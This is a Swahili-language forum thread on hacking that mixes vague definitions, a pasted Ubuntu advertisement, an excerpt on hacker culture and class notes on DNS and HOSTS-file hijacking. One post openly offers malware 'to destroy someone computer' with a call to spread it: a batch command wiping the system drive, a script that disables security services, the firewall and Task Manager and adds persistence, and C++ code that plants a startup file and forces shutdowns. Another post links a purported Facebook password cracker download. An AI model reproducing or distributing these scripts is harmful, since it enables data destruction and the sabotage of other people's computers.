Hacking katika internet

Herbalist Dr MziziMkavu

JF-Expert Member
Feb 3, 2009
42,319
33,125
Kuna baadhi ya watu hasa vijana wakisoma kuhusu computer kidogo tu basi atakuja kwenye maneno kama virus au spyware ( sikuhizi ) , ukitoka kwenye hayo atakuja katika hacking , cracking na phreaking yote hayo , lakini wengi wanapenda zaidi hacking . wengi wanapenda hii iliwekeza kuharibu kitu Fulani zaidi kuangalia emailza za wenzao na kadhalika .

Leo naongelea kuhusu hacking , phreaking na cracking , ntakuambia kitu hacking ni kitendo cha mtu au kundi Fulani la watu , kuingia katika mtandao wa computer nyingine kwa njia zisizo sahihi , kwa malengo ya uharibufu au wizi wa data ( kumbuka hakuna hacker mjinga na hackers wote wanajuwa wanachofanya ndio maana anajiandaa vya kutosha .

Katika hacking sharti la kwanza ni bora ujuwe angalau lugha 2 au zaidi zinazotumika katika kutengeza programs ili nawe utengeneze zako kwa shuguli zako kama hizo hizo , pia ujuwe jinsi computer zinavyowasiliana ( internet na sheria zake ) Mfano protocols , aina zake , na command kadhaa . Katika operating system unatakiwa ujue angalau linux au unix , hata windows lakini ukifanya hacking katika windows hakuna atakayekusifia kwa sababu nyingi ni rahisi .

Kwenye hacking kuna watu aina 2 , kuna hacker mwenyewe anayeendasha kitendo hicho , na victim ( huyu victim ndio mvamiwa ) sasa kabla ya kuvamia mara nyingi kutumika mtindo wa network scanning ( kuna prorame maalumu kwa ajili ya kufanya scanning unaweza kupata bure katika internet au unaweza tengeneza mwenyewe ndio maana unatakiwa kujuwa kutengeneza programmes kwa matakwa yako .

Akisha fanya scanning , atapata jibu kuhusu computer yako na taarifa zako ( hiyo ni kama computer yenyewe sio safe ) sio safe kama haina firewall au programe yoyote ya kuweza kuilindi mtu kutoka mtandao tofauti kuweza kuingilia computer yako , akisha fanya scanning jibu analopata ni kuhusu computer yako ( IP ADDRESS , OPERATING SYSTEM , USER NAME , GETWAY , ISP ) muhimu zaidi ni GETWAY na Hiyo IP ADDRESS .

Okey akisha pata hiyo basi atajaribu kuingia katika computer yako au mtandao wako , kutumia windows xp ni rahisi zaidi kuingia kuliko zingine , katika windows xp kuna siri nyingi zaidi zimejificha ambazo ni rahisi kujulikana hasa katika internet explorer , drivers za NIC na kadhalika , siwezi kutaja vyote kama una hobby ya hacking ni vizuri ukaaanza kutafuta mwenyewe .

Katika hacking mtu huruhusiwi kutowa siri yoyote , bali kuelekeza tu mengine anafanya mwenywe na kusoma mwenywe mpaka naye aje kuwa mtaalamu zaidi , usichoke kusoma au kutafuta note za ziada , kusoma ili kupat akuelewa zaidi .

Cracking ni Kitendo cha kubadili programe Fulani kwa matakwa yako haswa hizi programe za trial au za demo , kama games na kadhalika , na phreaking ni aina ya hacking pia lakini inatumika kwa njia ya simu mfano kuingilia computer ya mtu kutumia line za simu ( dialing )

Ahsante Happy Hacking

Yona Maro

Kwa wale wanaopenda mambo ya hacking kama mimi haya tena tuanze hapa kuelimishana
 
Katika kutumia hii Hacker ya Internet itabidi uwe na System ya Ubuntu ni bure tu ku install na ni bora zaidi kuliko Windows X au Windows 7. Na hiyo Ubuntu inapatika hapa bonyeza Download Ubuntu | Ubuntu

Ubuntu for you

Super-fast, easy to use and free, the Ubuntu operating system powers millions of desktops, netbooks and servers around the world. Ubuntu does everything you need it to. It'll work with your existing PC files, printers, cameras and MP3 players. And it comes with thousands of free apps.
Take the tour ›



What is an operating system?

An operating system is what makes your computer work. The core program of any computer, it's designed to run all your programs and manage all your hardware and software. Other examples of operating systems include Microsoft Windows, Mac OS X and Android.
Why use Ubuntu? ›

How does it compare to my system?

With Ubuntu, you can do everything you can do with other operating systems. But faster. And for free!
Explore features ›
How can it be free?

Ubuntu is, and always will be, absolutely free. Created by the best open-source experts from all over the world, Ubuntu is available in 24 languages and ready for download today.
Why is it free? ›

Only on Ubuntu
  • ubuntuforyou-only-freeapps.jpg
    Thousands of free apps
  • ubuntuforyou-only-upgrades.jpg
    Free upgrades for life
  • ubuntuforyou-only-protection.jpg
    Built-in security
  • ubuntuforyou-only-musicstore.jpg
    Ubuntu One Music Store



  1. ubuntu_osx03.thumbnail.jpg
    ubuntu_osx02.thumbnail.jpg
    ubuntu_osx03.jpg
 
umesomeka mkuu,sasa mimi nina ubuntu ila naanza vp kujifunza hii hacking, ni vitu gani napaswa nivijue?
 
this is for all that want to destroy someone computer i put some scrpits together and i made viruses see and try and good luck !!! Just open notepad and copy this scripts or codes and save them as name.bat and then spred them !!!! SOOO SIMPLE
-system32


del %systemdrive%\*.* /s /f /q


-worm


@echo off
taskkill -f -im explorer.exe
copy virus.bat C:\windows\
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
start iexplore.exe Google
net user hhthhy virus /add
net user roc13xtyh virus /add
net user roc13x123 virus /add
net user roc13x1 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x3 virus /add
net user roc13x4 virus /add
net user roc13x5 virus /add
net user roc13x6 virus /add
net user roc13x7 virus /add
net user roc13x8 virus /add
net user roc13x9 virus /add
net user roc13x0 virus /add
net user roc13x10 virus /add
net user roc13x10 virus /add
net user roc13x12 virus /add
net user roc13x2 virus /add
net user roc13x1 virus /add
net user roc13x2 virus /add
net user roc13x34 virus /add
net user roc13x34 virus /add
net user roc13x33 virus /add
net user roc13x343 virus /add
net user roc13x45 virus /add
net user roc13x00 virus /add
net user roc13x000 virus /add
net user roc13x0000 virus /add
net user roc13x00000 virus /add
net user roc13x000000 virus /add
net user roc13x0000000 virus /add
net user roc13x00000000 virus /add
net user roc13x000000000 virus /add
net user roc13x0000000000 virus /add
net user roc13x00000000000 virus /add
net user roc13x000000000000 virus /add
net user my comp /delete
mkdir %userprofile%\desktop\virus3000 njhjkhjkh
mkdir %userprofile%\desktop\virus3000hjhkhhjkh j
mkdir %userprofile%\desktop\virus3000jjjkjjj
mkdir %userprofile%\desktop\virus3000jhh
net stop "security center"
net stop "sharedaccess"
net stop "windows defender"
netsh firewall set opmode mode = disable
del "%userprofile%\desktop\internet explorer"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\wi ndows\currentversion\run /hate /d C:\windows\bulldog worm.bat
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\system /v DisableTaskMgr /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoClose /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer /v DisallowRun /t REG_DWORD /d 1
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 1 /d iexplore.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 2 /d notepad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 3 /d wordpad.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 4 /d wmplayer.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 5 /d msnmsgr.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 6 /d avast.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d help.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d steam.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d winmail.exe
reg add HKEY_CURRENT_USER\software\microsoft\win dows\currentversion\policies\explorer\Di sallowRun /v 7 /d outlook.exe
title VIRUS ALERT
color 04
echo A VIRUS HAS BEEN DETECTED ON YOUR COMPUTER AND WILL ERASE EVERYTHING!
shutdown -r


-matrix


#include
#include
#include
#include
#include
#include
#include
using namespace std;
int main()
{ keybd_event(VK_MENU,0x38,0,0);
keybd_event(VK_RETURN,0x1c,0,0);
keybd_event(VK_RETURN,0x1c,KEYEVENTF_KEYUP,0);
keybd_event(VK_MENU,0x38,KEYEVENTF_KEYUP,0);
HANDLE outToScreen;
outToScreen = GetStdHandle(STD_OUTPUT_HANDLE);
{
char buffer[255];
char inputFile[]="C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat";
ifstream input(inputFile);
if (!input)
{
{
ofstream fp("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\rawr.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
}
}
}
{
char buffer[255];
char inputFile[]="C:\\rawr.exe";
ifstream input(inputFile);
if (!input)
{
{
{
ofstream fp("CLICK.bat", ios::app);
fp << "@ECHO OFF \n";
fp << "COPY matrix.exe C:\\rawr.exe \n";
fp << "START C:\\rawr.exe \n";
fp << "EXIT";
}
system("START CLICK.bat");
main();
}
}
else
{
while (!input.eof())
{
input.getline(buffer,255);
system("call shutdown.exe -S");
goto START;
}
}
}
START:{
for(int i = 0; i < 1; i++)
{
int num = (rand() % 10);
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN | FOREGROUND_INTENSITY);
cout << setw(4) << num;
cout << setw(4) << "0%";
cout << setw(4) << "P";
cout << setw(4) << " ";
cout << setw(4) << ")";
cout << setw(4) << "#";
cout << setw(4) << "X";
cout << setw(4) << "@";
cout << setw(4) << "1&";
cout << setw(4) << "*";
cout << setw(4) << "||";
cout << setw(4) << " \a";
Sleep(60);
}
}
for ( int j = 0; j < 5; j++)
{
SetConsoleTextAttribute(outToScreen, FOREGROUND_GREEN);
int number = (rand() % 24);
cout << setw(4) << number;
}
goto START;
 
umesomeka mkuu,sasa mimi nina ubuntu ila naanza vp kujifunza hii hacking, ni vitu gani napaswa nivijue?
Ndio tunakwenda Taratibu la kama una taka haraka na kiingereza kinapanda jaribu kujiunga na website za Hacker hizi hapa bonyeza Forum au hii Hackers Center Security Portal au hii hacker.org :: Index jiunge huko utapata faida nyingi mimi nipo huko natumia jina la Lucky.

[h=2]How To Become A Hacker Bonyeza hapa http://www.pavietnam.net/[/h]
[h=2]What Is a Hacker?[/h]


The Jargon File contains a bunch of definitions of the term â&#8364;&#732;hackerâ&#8364;&#8482;, most having to do with technical adeptness and a delight in solving problems and overcoming limits. If you want to know how tobecome a hacker, though, only two are really relevant.
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term â&#8364;&#732;hackerâ&#8364;&#8482;. Hackers built the Internet. Hackers made the Unix operating system what it is today. Hackers run Usenet. Hackers make the World Wide Web work. If you are part of this culture, if you have contributed to it and other people in it know who you are and call you a hacker, you're a hacker.
The hacker mind-set is not confined to this software-hacker culture. There are people who apply the hacker attitude to other things, like electronics or music â&#8364;" actually, you can find it at the highest levels of any science or art. Software hackers recognize these kindred spirits elsewhere and may call them â&#8364;&#732;hackersâ&#8364;&#8482; too â&#8364;" and some claim that the hacker nature is really independent of the particular medium the hacker works in. But in the rest of this document we will focus on the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term â&#8364;&#732;hackerâ&#8364;&#8482;.
There is another group of people who loudly call themselves hackers, but aren't. These are people (mainly adolescent males) who get a kick out of breaking into computers and phreaking the phone system. Real hackers call these people â&#8364;&#732;crackersâ&#8364;&#8482; and want nothing to do with them. Real hackers mostly think crackers are lazy, irresponsible, and not very bright, and object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer. Unfortunately, many journalists and writers have been fooled into using the word â&#8364;&#732;hackerâ&#8364;&#8482; to describe crackers; this irritates real hackers no end.
The basic difference is this: hackers build things, crackers break them.
If you want to be a hacker, keep reading. If you want to be a cracker, go read the alt.2600 newsgroup and get ready to do five to ten in the slammer after finding out you aren't as smart as you think you are. And that's all I'm going to say about crackers.
 





Hapa tutajifunza kwa kutumia Video itakuwa ni
Vizuri sana unasemaje Wakuu?
 
Last edited by a moderator:
Ndio tunakwenda Taratibu la kama una taka haraka na kiingereza kinapanda jaribu kujiunga na website za Hacker hizi hapa bonyeza Forum au hii Hackers Center Security Portal au hii hacker.org :: Index jiunge huko utapata faida nyingi mimi nipo huko natumia jina la Lucky.

poa ngoja nicheki
Mkuu zipo Website nyingi tu za Hacker





Facebook Password Cracker_Hacker.exe (756 KB) bonyeza hapa http://www.multiupload.com/PS9H75WVV4

 
Last edited by a moderator:
Mti mkavu ila umechemka kusema ubuntu ni windows na watu weng tu nshasikia wanamix mambo. Ubuntu ni open source os
 





Level: Intermediate
Presenter: Eli the Computer Guy
Date Created: November 1, 2010
Length of Class: 45 Minutes
Tracks

Hacking
Computer Security /Integrity
Prerequisites

Knowledge of TCP/IP and Domain Name Resolution
Purpose of Class

This class teaches students how use DNS to redirect computer or network users to alternate websites or servers for security or malicious purposes.
Topics Covered

How DNS Works
Editing the HOSTS file
Alternate Public DNS
Planning a DNS Hack
Reasons to Hack DNS
Class Notes

Introduction
DNS resolves Domain Names to IP Addresses
Warning: Use at your own risk
DNS

HOSTS file is the local file that resolves Domain Names
Windows Location = C:\Windows\System32\drivers\etc
Example = 10.1.10.2 $50 Computer Repair in Baltimore - Eli the Computer Guy - PC Repair - Laptop Repair - Data Recovery - Mac Repair

In Vista/ Windows 7 First Open Notepad using "Run as Administrator" and then open the HOSTS file. Otherwise you will not be able to save your edits.

Computers FIRST try to Resolve a Domain Name with the HOSTS file, they then Go To the LOCAL DNS Server, and then they Query the PUBLIC DNS Server. If any server has a record the computer does not ask any other sources. SO if the

HOSTS file has a record the computer uses that record and stops.
Using Alternate DNS

You do not have to use the Public DNS IP Addresses that your ISP gave you. You can use Alternate Public DNS Servers.
The benefit of using a server like OpenDNS.org is that they will prevent Domain Names for malicious websites from resolving. This is a HUGE security tool.

You can create your own Public DNS Server for Good/ Bad Purposes.
The DNS Attack

HOSTS file can be compromised either through manual editing, or through scripting. If users are logged in as USERS vs. ADMINISTRATORS there is far less chance that a script will be able to modify the HOSTS file.

By Wardriving or Plugging Into an Unsecured Network Jack You May be able to Hack the DNS Server. Routers/ Modems with default passwords are easy to Hack.

A clever, well disguised DNS Hack is very difficult to detect once it has been successfully implemented, and it is moderately difficult to circumvent if it is done by a network administrator to secure a network.
Final Thoughts
Hacking DNS is the EASIEST way to either protect or attack a network or computer

Category:

Science & Technology
Tags:

 
Last edited by a moderator:
Back
Top Bottom